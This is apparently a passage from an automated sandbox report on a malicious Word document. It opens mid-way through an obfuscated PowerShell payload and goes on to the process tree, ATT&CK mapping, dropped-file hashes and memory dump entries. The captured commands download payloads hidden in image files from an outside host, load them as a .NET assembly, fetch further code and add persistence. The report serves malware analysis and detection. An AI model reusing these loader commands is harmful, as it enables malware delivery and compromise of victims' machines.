8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBDDgTreFYDgTreUgDgTrevDgTreDDgTreDgTreMDgTreDgTrexDgTreC8DgTreODgTreDgTrexDgTreDIDgTreLgDgTre1DgTreDkDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFIDgTreVgBDDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CVR/001/812.59.3.291//:ptth' , '1' , 'C:\ProgramData\' , 'RVC','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\RVC.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2936

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
77fff4010e48018b867bb350fb78b7c2

SHA1
31b0dfcc0b92a789cd5c94dbf8d0f5aca820ed31

SHA256
3e95094f49fea7951fb5ea5551a8b344c1ec16ddaf4f5da7b6bfe1151afa9ee5

SHA512
78a8fc7de1b3cbbc2225790bf55fd64b3c7fa922b4601dcbb1103cc12491da71ebae1eebfaa3a2ce2e0b3b3a7b7229dd448012c23a707f84aae8fe0e996c7e89

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
1102a65ce94fe7941afb826649721d32

SHA1
9a61b1d396c750fc020c3a3d8456380485e47b44

SHA256
a8bd5981212e6668a747fd9d1c0bbd7849c2509a056e5ec5443766e747ac5a11

SHA512
2306e6275e5cd06d5dde536064dae12a4242a69c61bf8275bb8d7a3b73ad3b2c97a1b8947c3b7ac9dca4c92d306991f367994438ee7391a092e23b7378fb2c92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c9ff12c9e239d0ea6fca810fe090e715

SHA1
f8b82b5fc464731a1baccc9ba8ba2eaebb6df8d3

SHA256
09ccb7c4bf3262aa1969666a67e95233c21df9a2400c92b5f5b05fcb4fbe4790

SHA512
78629011a69b1b7aabc37d9482201e7d694a02135250881d5d905eaa70e686728b26db4724a1d724d48ec7192526b400ccdc0e400e720b70c6e72a4025089e01

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
bf68a614f0131a85bb60b58628d3bb4e

SHA1
9f3ab99aac36f32c510287ceb1d34adc352f63c7

SHA256
d5fc40aac4d8d05927ac8dfa97b65b365dfcf8d9e1171902d373009cc78c9a36

SHA512
0bd50e3c998e02f9208b55304de9b513365f997bc216bf3f648834cd2ed531bee2808c2915727dd613948e3f2a53ef0024fdf78a2205800642d1dcf6407c79e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{57739DD2-67EF-43A2-ACD2-E4D3F14E3FDF}.FSD
Filesize
128KB

MD5
175a9e20ba96a0dde784e10dbb4cb721

SHA1
0ae822054acbdc483558155a44640688206ba21d

SHA256
3038236afd67ec9947682731787872efd29e66c7389b81a853ab29576216943e

SHA512
b32d01c87d28b61a3910e85515776151108721de7808cd83a18e18ab715cc7452371431c09c42d6d5e82a789aa9340b0f2657644b1b2ca3635b6b867adfa8dab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
4a2a5d10d2feb76f8fe1d4fc048866fc

SHA1
9ec8e6da3028cb1a8a7c99e0dfeba52ca966332d

SHA256
275789722fdc632505e2d119efef86a3d15ad3bc880df74f2c48e26309d9d7a8

SHA512
93b57e81874f4b2a5396bdd78da4369ee3001969ceeddf76e44897f8fb3c3c0f0b15092ec72523b4074f4b4f1f5be41089c82a1ccf1e04d554c2b736dbba5638

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{A4825F2F-DA23-40E3-A4FC-0D912E867E0A}.FSD
Filesize
128KB

MD5
835e2bfce440f87bab782cfd0f495cdc

SHA1
0203b8b5f80893f433aef46698606d1b367139ac

SHA256
9928a78d636b43a1bb7b12c4c103178f09aefebd14e1be5074670ff919bd4b04

SHA512
0908cc4ccd5a6f88148e2b7bba58378e290c395f0f59fb4baa78bb850b92492738d87487eaa71ffa203a433a4dd0842171cf5d0b59dd22b93095475e192185a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\wetrytosexwithhertrulyfromtheheartbecausesheisverybeautigfulgirlwholikesxwthmefromtheheart___toundersadhowmuchiwantherforexsheisvey[1].doc
Filesize
71KB

MD5
28f01b474be6aeb345aaca18388a3ad6

SHA1
ca62d1a84fc88a61ab5ec5162219f847ffd4ab70

SHA256
2562b562a8f29256cf16403c893b482838edee61e631639c39a705237046d225

SHA512
6e6fb47442a111643e57167b0e181aa6299362f0d3aaefb79fe5d75338af18798229f178af9a2c25ae50ffae18c6d5eef92770a76f5e4848dc5188bbfccff2e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2897.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3007.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar39AF.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1CDA1922-71C5-43E9-82D7-6C474AF77553}
Filesize
128KB

MD5
c3fe797888c81d9aa428b78b25819540

SHA1
02a011fe2a71319c65bdcfe399c4f0d6ed09c87c

SHA256
0ad4068c3a581c113c28fb2430188f1e259485e18820ccdbd845dba7879ff250

SHA512
e4925f98a6df54605fcbd53d76fe2aa6369a8653ce4e36b993bb8508f217b777e4cb6f544e4a8b1661d4048e6c84451786048951e0027ea32c9dd972e6527e7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\P9Q3WVNV.txt
Filesize
831B

MD5
55aef6c37e9f9b1a784e8a90aa4969b8

SHA1
e0ec3e91b80f60e3e9cf553af987a34408664617

SHA256
b24cf851b79e0d0493ea460ff1d955e4f50d3d42d5f359c37e893c338f2cb36e

SHA512
f32b2a906644e306a162889be8f441cc50baef17757a36fa8899932f420d318f56f64a4bcb7777ceeb5e2cf23a0b80f4c04dae8e243c6624a6db6a8b97a232a3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
9a5fec497259c716ac9e97ed9f8951f2

SHA1
d3e3a9a5e910982e360efb10a6d387de97c9557f

SHA256
0a0d091822052016118864aa0d66d8ae00fdf86ae04c805a6d8eec1943d444f9

SHA512
604505c7873730a2faf82bec2a9cb4cfebad8065b702b1c27f6c3b339036b7a4f9008b9f63b4e927f304caccf0e73e5c34930b9122e0ebcc562a5d591cb70903

Download Submit
C:\Users\Admin\AppData\Roaming\loverskissingforimage.vbs
Filesize
399KB

MD5
42351519fa2bf8b9471c118ce7d57dfd

SHA1
ba9c7fdd039f45f740f87c8f5cf0134077c9df06

SHA256
d630249c7d763545e77e9711a459127bd99a1ad4cb00d0f49f5bff575cda3b41

SHA512
afa500007c9cd1714c1e162c5aed63dfabc6870afdd22cb804ad8ffa41cb932a1af2059893ac942490bb2fece8f842eca22d3ad9f3410a8275f4c82dfce9850c

Download Submit
memory/1748-148-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/1748-149-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1748-262-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1748-147-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1900-235-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1900-234-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1900-240-0x00000000028A0000-0x00000000028E0000-memory.dmp

Filesize
256KB

Download
memory/1900-239-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1900-241-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1900-236-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/1948-28-0x0000000002E20000-0x0000000002E22000-memory.dmp

Filesize
8KB

Download
memory/1948-227-0x000000007271D000-0x0000000072728000-memory.dmp

Filesize
44KB

Download
memory/1948-1-0x000000007271D000-0x0000000072728000-memory.dmp

Filesize
44KB

Download
memory/1948-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2700-266-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/2700-267-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/2700-141-0x0000000002A70000-0x0000000002AB0000-memory.dmp

Filesize
256KB

Download
memory/2700-139-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/2700-140-0x000000006A410000-0x000000006A9BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-27-0x0000000003710000-0x0000000003712000-memory.dmp

Filesize
8KB

Download
memory/2900-233-0x000000007271D000-0x0000000072728000-memory.dmp

Filesize
44KB

Download
memory/2900-23-0x000000002F6B1000-0x000000002F6B2000-memory.dmp

Filesize
4KB

Download
memory/2900-25-0x000000007271D000-0x0000000072728000-memory.dmp

Filesize
44KB

Download
memory/2936-255-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-268-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-251-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-253-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-247-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-257-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2936-259-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-261-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-246-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-264-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-244-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-265-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-242-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-249-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-269-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-270-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-271-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-273-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-274-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-275-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-276-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-277-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-278-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-279-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-280-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-281-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2936-282-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download